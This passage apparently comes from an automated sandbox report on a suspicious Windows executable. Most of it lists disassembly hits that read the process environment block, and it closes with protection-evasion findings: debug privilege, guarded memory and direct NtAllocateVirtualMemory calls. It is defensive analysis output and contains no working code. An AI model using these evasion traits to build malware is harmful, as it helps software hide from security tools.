                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F0 mov eax, dword ptr fs:[00000030h]5_2_0159E3F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F0 mov eax, dword ptr fs:[00000030h]5_2_0159E3F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163C3CD mov eax, dword ptr fs:[00000030h]5_2_0163C3CD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016243D4 mov eax, dword ptr fs:[00000030h]5_2_016243D4
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016243D4 mov eax, dword ptr fs:[00000030h]5_2_016243D4
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov eax, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov eax, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov ecx, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov eax, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578397 mov eax, dword ptr fs:[00000030h]5_2_01578397
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578397 mov eax, dword ptr fs:[00000030h]5_2_01578397
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578397 mov eax, dword ptr fs:[00000030h]5_2_01578397
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A438F mov eax, dword ptr fs:[00000030h]5_2_015A438F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A438F mov eax, dword ptr fs:[00000030h]5_2_015A438F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E388 mov eax, dword ptr fs:[00000030h]5_2_0157E388
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E388 mov eax, dword ptr fs:[00000030h]5_2_0157E388
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E388 mov eax, dword ptr fs:[00000030h]5_2_0157E388
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586259 mov eax, dword ptr fs:[00000030h]5_2_01586259
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A250 mov eax, dword ptr fs:[00000030h]5_2_0157A250
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01608243 mov eax, dword ptr fs:[00000030h]5_2_01608243
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01608243 mov ecx, dword ptr fs:[00000030h]5_2_01608243
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A250 mov eax, dword ptr fs:[00000030h]5_2_0163A250
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A250 mov eax, dword ptr fs:[00000030h]5_2_0163A250
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584260 mov eax, dword ptr fs:[00000030h]5_2_01584260
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584260 mov eax, dword ptr fs:[00000030h]5_2_01584260
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584260 mov eax, dword ptr fs:[00000030h]5_2_01584260
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157826B mov eax, dword ptr fs:[00000030h]5_2_0157826B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157823B mov eax, dword ptr fs:[00000030h]5_2_0157823B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902E1 mov eax, dword ptr fs:[00000030h]5_2_015902E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902E1 mov eax, dword ptr fs:[00000030h]5_2_015902E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902E1 mov eax, dword ptr fs:[00000030h]5_2_015902E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov ecx, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE284 mov eax, dword ptr fs:[00000030h]5_2_015BE284
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE284 mov eax, dword ptr fs:[00000030h]5_2_015BE284
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600283 mov eax, dword ptr fs:[00000030h]5_2_01600283
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600283 mov eax, dword ptr fs:[00000030h]5_2_01600283
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600283 mov eax, dword ptr fs:[00000030h]5_2_01600283
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902A0 mov eax, dword ptr fs:[00000030h]5_2_015902A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902A0 mov eax, dword ptr fs:[00000030h]5_2_015902A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588550 mov eax, dword ptr fs:[00000030h]5_2_01588550
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588550 mov eax, dword ptr fs:[00000030h]5_2_01588550
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B656A mov eax, dword ptr fs:[00000030h]5_2_015B656A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B656A mov eax, dword ptr fs:[00000030h]5_2_015B656A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B656A mov eax, dword ptr fs:[00000030h]5_2_015B656A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616500 mov eax, dword ptr fs:[00000030h]5_2_01616500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015865D0 mov eax, dword ptr fs:[00000030h]5_2_015865D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA5D0 mov eax, dword ptr fs:[00000030h]5_2_015BA5D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA5D0 mov eax, dword ptr fs:[00000030h]5_2_015BA5D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE5CF mov eax, dword ptr fs:[00000030h]5_2_015BE5CF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE5CF mov eax, dword ptr fs:[00000030h]5_2_015BE5CF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC5ED mov eax, dword ptr fs:[00000030h]5_2_015BC5ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC5ED mov eax, dword ptr fs:[00000030h]5_2_015BC5ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015825E0 mov eax, dword ptr fs:[00000030h]5_2_015825E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016005A7 mov eax, dword ptr fs:[00000030h]5_2_016005A7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016005A7 mov eax, dword ptr fs:[00000030h]5_2_016005A7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016005A7 mov eax, dword ptr fs:[00000030h]5_2_016005A7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE59C mov eax, dword ptr fs:[00000030h]5_2_015BE59C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B4588 mov eax, dword ptr fs:[00000030h]5_2_015B4588
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582582 mov eax, dword ptr fs:[00000030h]5_2_01582582
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582582 mov ecx, dword ptr fs:[00000030h]5_2_01582582
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A45B1 mov eax, dword ptr fs:[00000030h]5_2_015A45B1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A45B1 mov eax, dword ptr fs:[00000030h]5_2_015A45B1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A245A mov eax, dword ptr fs:[00000030h]5_2_015A245A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160C460 mov ecx, dword ptr fs:[00000030h]5_2_0160C460
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157645D mov eax, dword ptr fs:[00000030h]5_2_0157645D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AA470 mov eax, dword ptr fs:[00000030h]5_2_015AA470
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AA470 mov eax, dword ptr fs:[00000030h]5_2_015AA470
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AA470 mov eax, dword ptr fs:[00000030h]5_2_015AA470
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A456 mov eax, dword ptr fs:[00000030h]5_2_0163A456
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606420 mov eax, dword ptr fs:[00000030h]5_2_01606420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8402 mov eax, dword ptr fs:[00000030h]5_2_015B8402
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8402 mov eax, dword ptr fs:[00000030h]5_2_015B8402
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B8402 mov eax, dword ptr fs:[00000030h]5_2_015B8402
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA430 mov eax, dword ptr fs:[00000030h]5_2_015BA430
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157C427 mov eax, dword ptr fs:[00000030h]5_2_0157C427
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E420 mov eax, dword ptr fs:[00000030h]5_2_0157E420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E420 mov eax, dword ptr fs:[00000030h]5_2_0157E420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E420 mov eax, dword ptr fs:[00000030h]5_2_0157E420
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015804E5 mov ecx, dword ptr fs:[00000030h]5_2_015804E5
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160A4B0 mov eax, dword ptr fs:[00000030h]5_2_0160A4B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B44B0 mov ecx, dword ptr fs:[00000030h]5_2_015B44B0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015864AB mov eax, dword ptr fs:[00000030h]5_2_015864AB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A49A mov eax, dword ptr fs:[00000030h]5_2_0163A49A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580750 mov eax, dword ptr fs:[00000030h]5_2_01580750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2750 mov eax, dword ptr fs:[00000030h]5_2_015C2750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2750 mov eax, dword ptr fs:[00000030h]5_2_015C2750
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B674D mov esi, dword ptr fs:[00000030h]5_2_015B674D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B674D mov eax, dword ptr fs:[00000030h]5_2_015B674D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B674D mov eax, dword ptr fs:[00000030h]5_2_015B674D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588770 mov eax, dword ptr fs:[00000030h]5_2_01588770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590770 mov eax, dword ptr fs:[00000030h]5_2_01590770
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01604755 mov eax, dword ptr fs:[00000030h]5_2_01604755
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E75D mov eax, dword ptr fs:[00000030h]5_2_0160E75D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01580710 mov eax, dword ptr fs:[00000030h]5_2_01580710
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B0710 mov eax, dword ptr fs:[00000030h]5_2_015B0710
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC700 mov eax, dword ptr fs:[00000030h]5_2_015BC700
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B273C mov eax, dword ptr fs:[00000030h]5_2_015B273C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B273C mov ecx, dword ptr fs:[00000030h]5_2_015B273C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B273C mov eax, dword ptr fs:[00000030h]5_2_015B273C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015FC730 mov eax, dword ptr fs:[00000030h]5_2_015FC730
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC720 mov eax, dword ptr fs:[00000030h]5_2_015BC720
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC720 mov eax, dword ptr fs:[00000030h]5_2_015BC720
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160E7E1 mov eax, dword ptr fs:[00000030h]5_2_0160E7E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158C7C0 mov eax, dword ptr fs:[00000030h]5_2_0158C7C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015847FB mov eax, dword ptr fs:[00000030h]5_2_015847FB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015847FB mov eax, dword ptr fs:[00000030h]5_2_015847FB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016007C3 mov eax, dword ptr fs:[00000030h]5_2_016007C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A27ED mov eax, dword ptr fs:[00000030h]5_2_015A27ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A27ED mov eax, dword ptr fs:[00000030h]5_2_015A27ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A27ED mov eax, dword ptr fs:[00000030h]5_2_015A27ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016347A0 mov eax, dword ptr fs:[00000030h]5_2_016347A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162678E mov eax, dword ptr fs:[00000030h]5_2_0162678E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015807AF mov eax, dword ptr fs:[00000030h]5_2_015807AF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164866E mov eax, dword ptr fs:[00000030h]5_2_0164866E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164866E mov eax, dword ptr fs:[00000030h]5_2_0164866E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159C640 mov eax, dword ptr fs:[00000030h]5_2_0159C640
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B2674 mov eax, dword ptr fs:[00000030h]5_2_015B2674
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA660 mov eax, dword ptr fs:[00000030h]5_2_015BA660
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA660 mov eax, dword ptr fs:[00000030h]5_2_015BA660
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C2619 mov eax, dword ptr fs:[00000030h]5_2_015C2619
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159260B mov eax, dword ptr fs:[00000030h]5_2_0159260B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Process token adjusted: Debug
                Source: C:\Users\user\Desktop\BcF3o0Egke.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe NtAllocateVirtualMemory: Direct from: 0x76EF48EC
